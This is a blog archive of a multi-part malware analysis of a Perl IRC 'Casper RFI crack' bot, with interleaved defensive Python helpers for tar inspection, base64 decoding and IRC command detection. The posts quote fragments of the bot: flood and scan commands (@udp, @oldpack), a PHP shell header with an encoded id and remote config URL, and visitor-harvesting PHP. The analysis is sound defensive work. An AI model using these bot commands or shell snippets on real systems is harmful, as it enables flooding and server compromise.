Irregular Expressions:

August, 2010


August 27, 2010  1:14 PM

Casper RFI crack bot – Part 9



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt; there is not a whole lot in there besides the defacement message, so we are going to move on. The next item is a tar.gz, psy.tar.gz.  Let's unpack it and look around. It's from a project...
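Before unpacking an archive that came off a compromised server, it is worth listing what it would write and where: a tarball built by an attacker can carry entries with absolute paths, ../ components, or links that point outside the extraction directory, and a plain tar xzf will happily follow them. The check below is an added example, not code from the original post; it uses only the standard library tarfile module, and the archive it inspects is constructed inline as a stand-in for psy.tar.gz, not the real file.

```python
import io
import posixpath
import tarfile


def unsafe_members(tar_bytes):
    """Return [(name, reason)] for archive entries that would land outside the extraction directory."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            name = m.name
            if name.startswith("/"):
                bad.append((name, "absolute path"))
            elif ".." in posixpath.normpath(name).split("/"):
                bad.append((name, "parent-directory traversal"))
            elif m.issym() or m.islnk():
                # symlink targets are relative to the link's directory, hard links to the archive root
                base = posixpath.dirname(name) if m.issym() else ""
                target = posixpath.normpath(posixpath.join(base, m.linkname))
                if m.linkname.startswith("/") or target == ".." or target.startswith("../"):
                    bad.append((name, f"link escapes to {m.linkname}"))
            elif m.isdev():
                bad.append((name, "device node"))
    return bad


def build_sample_tarball():
    """Constructed stand-in for psy.tar.gz: one benign entry plus three hostile ones."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(name, data=b"", **attrs):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            for key, value in attrs.items():
                setattr(info, key, value)
            tar.addfile(info, io.BytesIO(data) if data else None)
        add("psy/README", b"sample text\n")
        add("psy/../../etc/cron.d/psy", b"* * * * * root /tmp/psy\n")   # would write into /etc
        add("/usr/local/bin/psy", b"#!/bin/sh\n")                         # absolute path
        add("psy/link", type=tarfile.SYMTYPE, linkname="../../root/.ssh")  # link out of the tree
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in unsafe_members(build_sample_tarball()):
        print(f"{name}: {reason}")
```

`tar -tzvf psy.tar.gz` shows the same member list by hand; the function just automates the three things to look for before extracting into a scratch directory.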

August 27, 2010  11:59 AM

Casper RFI crack bot – Part 8



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

We have one more to decode: $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target =...


August 27, 2010  8:48 AM

Casper RFI crack bot – Part 7



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was...


August 27, 2010  8:33 AM

Casper RFI crack bot – Part 6



Posted by: Dan O'Connor
casper bot perl, casper perl, casper rfi bot, perl bot, www bot

We can do something fun with this,

$defacer     = "def.txt";
less def.txt
<title>-- Hacked bY XXXXXXXX --</title>
Off to Google we go, this won't give an exact number, but we are going to be able to get a count of the number of web servers this guy...


August 22, 2010  9:44 PM

Casper RFI crack bot – Part 5



Posted by: Dan O'Connor
casper perl, casper rfi bot, casper.pl

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de; both sites are no longer up and have not been for a while. There are also a few things worth looking into here: the script mentions fx29shell.php, which is a PHP shell that can be loaded onto the system. I can...


August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4



Posted by: Dan O'Connor
backdoor, casper, perl rfi crack bot, rootkit, sudo exploit

sh.txt This one also looks juicy! Another PHP file: <?php $sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20="; $sh_ver = "0.0 01.01.2010"; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = "http://xxxxxx.ru/config/"; $html_start =...
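The "decoding" in Parts 4, 7 and 8 comes down to spotting literals like $sh_id that are plain base64 rather than encryption and running them through base64_decode. The helper below is an added example, not the author's code: it pulls double-quoted literals that are assigned to a variable or passed straight to base64_decode() out of a PHP or Perl source, and reports the ones that decode to printable text. The sample source and its encoded values are constructed for this example and are not the bot's real strings.

```python
import base64
import re
import string

# Constructed sample in the shape of the sh.txt fragment quoted above. The literals
# are made up for this example; they are not the bot's real strings.
SAMPLE_PHP = r'''<?php
$sh_id = "ZXhhbXBsZUBleGFtcGxlLmNvbQ==";
$sh_ver = "0.0 01.01.2010";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://xxxxxx.ru/config/";
$greeting = base64_decode("SGVsbG8gV29ybGQ=");
$noise = "abcd";
'''

# A double-quoted literal either assigned to a variable or passed straight to
# base64_decode(); group 1 is the variable name (None for the call form).
STRING_SITE = re.compile(r'(?:\$(\w+)\s*=\s*|base64_decode\(\s*)"([^"]*)"')
B64_ALPHABET = re.compile(r'[A-Za-z0-9+/]+={0,2}')
PRINTABLE = set(string.printable.encode("ascii"))


def decode_if_base64(literal, min_len=8):
    """Decode `literal` if it is well-formed base64 yielding printable ASCII, else return None.

    The length and printable checks are what keep ordinary words, URLs and
    version strings from being reported as encoded data.
    """
    if len(literal) < min_len or len(literal) % 4 != 0 or not B64_ALPHABET.fullmatch(literal):
        return None
    try:
        raw = base64.b64decode(literal, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None
    if not raw or any(b not in PRINTABLE for b in raw):
        return None
    return raw.decode("ascii")


def find_encoded_strings(source):
    """Return [(variable_or_site, literal, decoded)] for every base64 string literal in `source`."""
    found = []
    for m in STRING_SITE.finditer(source):
        name, literal = m.group(1) or "base64_decode()", m.group(2)
        decoded = decode_if_base64(literal)
        if decoded is not None:
            found.append((name, literal, decoded))
    return found


if __name__ == "__main__":
    for name, literal, decoded in find_encoded_strings(SAMPLE_PHP):
        print(f"{name}: {literal!r} -> {decoded!r}")
```

Run against a real sample, the variable names that come back (identity strings, URLs, hostnames) are usually the first indicators worth recording; a literal that is valid base64 but decodes to non-printable bytes is the cue to look for a second layer such as gzinflate or a custom XOR.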


August 21, 2010  12:12 AM

Casper RFI crack bot – Part 3



Posted by: Dan O'Connor
casper perl bot

iso.txt is looking promising for a peek.

#!/usr/bin/perl
#
#  ShellBOT by: XXXXXXXXXXXX
#       Greetz: XXXXXXXXXXXXXX
#
# Commands:
#           @oldpack <ip> <bytes> <time>;
#           @udp <ip> <port> <time>;
#           @fullportscan...
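That command list is also the best handle for detection: the bot takes its orders as text in IRC PRIVMSGs, so a controller issuing a flood looks like a chat line starting with @udp or @oldpack followed by an IP, a number and a duration, and that syntax is the kind of thing a network signature (such as the Emerging Threats one referenced in Part 1) keys on. Below is an added example, not from the original post or the ET rule set: a parser that walks IRC log lines and flags messages that match the command syntax shown in the header above. The sample log is constructed for the example; @fullportscan is truncated on the page, so its arguments are left unspecified and passed through raw.

```python
import re
from ipaddress import ip_address

# Command syntax as given in the ShellBOT header comment quoted above. The page
# truncates @fullportscan, so its argument list is unknown and left as None.
BOT_COMMANDS = {
    "@oldpack": ("ip", "bytes", "time"),
    "@udp": ("ip", "port", "time"),
    "@fullportscan": None,
}

# IRC PRIVMSG line as seen on the wire: ":nick!user@host PRIVMSG #chan :text"
PRIVMSG = re.compile(r'^:(?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$')


def parse_command(text):
    """Return (command, {arg: value}) if `text` is a well-formed bot command, else None."""
    parts = text.strip().rstrip(";").split()   # the header shows a trailing ';'
    if not parts or parts[0].lower() not in BOT_COMMANDS:
        return None
    cmd = parts[0].lower()
    spec = BOT_COMMANDS[cmd]
    if spec is None:
        return cmd, {"raw_args": parts[1:]}
    if len(parts) - 1 != len(spec):
        return None                           # wrong arity: not the bot's syntax
    args = dict(zip(spec, parts[1:]))
    try:
        ip_address(args["ip"])                # target must be a literal IP
        for numeric in ("bytes", "port", "time"):
            if numeric in args:
                int(args[numeric])
    except ValueError:
        return None
    return cmd, args


def scan_irc_log(lines):
    """Return one detection dict per PRIVMSG that carries a bot command."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = PRIVMSG.match(line)
        if not m:
            continue
        parsed = parse_command(m.group("text"))
        if parsed:
            cmd, args = parsed
            hits.append({"line": lineno, "controller": m.group("nick"),
                         "channel": m.group("target"), "command": cmd, "args": args})
    return hits


# Constructed sample traffic, not a capture from the real bot or its IRC server.
SAMPLE_LOG = [
    ":ctrl!op@irc.example.net PRIVMSG #chan :@udp 192.0.2.10 80 60",
    ":ctrl!op@irc.example.net PRIVMSG #chan :@oldpack 198.51.100.7 1024 120;",
    ":user!u@host.example PRIVMSG #chan :hello @udp is a nice name",
    ":ctrl!op@irc.example.net PRIVMSG #chan :@fullportscan 203.0.113.5",
    "PING :irc.example.net",
    ":ctrl!op@irc.example.net PRIVMSG #chan :@udp notanip 80 60",
]

if __name__ == "__main__":
    for hit in scan_irc_log(SAMPLE_LOG):
        print(hit)
```

Matching on the full argument shape rather than on the bare "@udp" token is what keeps ordinary chatter (line 3 in the sample) out of the alerts; the controller nick and channel in each hit are the pivot points for finding the rest of the botnet in the same capture.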


August 21, 2010  12:04 AM

Casper RFI crack bot – Part 2



Posted by: Dan O'Connor
perl rfi bot

There is more than one file in each RAR that appears to be a copy of the bot. The differences are pretty minor.

scan.txt
-my @servers = ("irc.xxxx.org");
+my @servers = ("irc.xxxxxx.org","irc.xxxxxx.org");
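Review bot: the only change in this hunk is the @servers list growing from one IRC host to two, so the second copy of scan.txt differs from the first in its command-and-control infrastructure rather than in capability. When pulling indicators out of these files, record both hostnames, not just the first; a two-element list suggests the bot can fall back to the second server if the first is unreachable or sinkholed, which is worth confirming in the connect loop further down.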

@@ -3,7 +3,7 @@
 ################################
 #  CASPER RFI CRACK Bot v1.1 ...


August 20, 2010  10:31 PM

Casper RFI crack bot – Part 1



Posted by: Dan O'Connor
casper rfi, casper rfi bot, casper unix, rfi bot, unix bot

If you saw the ISC today (isc.sans.edu), there is a posting about a Perl Unix bot making the rounds: http://isc.sans.edu/diary.html?storyid=9430 There are signatures around from Emerging Threats to detect the bot, if you need them: http://doc.emergingthreats.net/2011176 I have found a server...


August 16, 2010  5:21 PM

Good blog on iPhone / iPad hacking



Posted by: Dan O'Connor
ipad jail break, iphone jail break

http://blog.iphone-dev.org/ I wish I could link to the first article.  It talks about a patch that is out for non-early iPhone and iPod touch users, which leaves them with security holes that they fixed and that can be applied through Cydia! I really appreciate people who take their time to give back...

